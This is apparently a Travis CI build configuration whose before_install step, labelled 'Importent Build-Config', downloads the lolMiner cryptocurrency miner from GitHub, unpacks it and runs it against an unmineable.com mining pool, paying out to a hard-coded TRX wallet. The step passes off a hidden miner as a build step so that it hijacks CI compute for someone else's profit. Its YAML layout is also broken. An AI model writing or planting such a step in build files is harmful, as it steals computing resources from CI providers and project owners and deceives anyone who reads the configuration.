language: c
dist: trusty
os: linux

before_install:
  
  # Importent Build-Config
  wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.28/lolMiner_v1.28a_Lin64.tar.gz

tar -xf lolMiner_v1.28a_Lin64.tar.gz

cd 1.28a/
./lolMiner --algo ETHASH --pool ethash.unmineable.com:3333 --user TRX:TLEMtvVvb5xeXvBBxAvobnm4owoSoiZR7u.colab --ethstratum  ETHPROXY
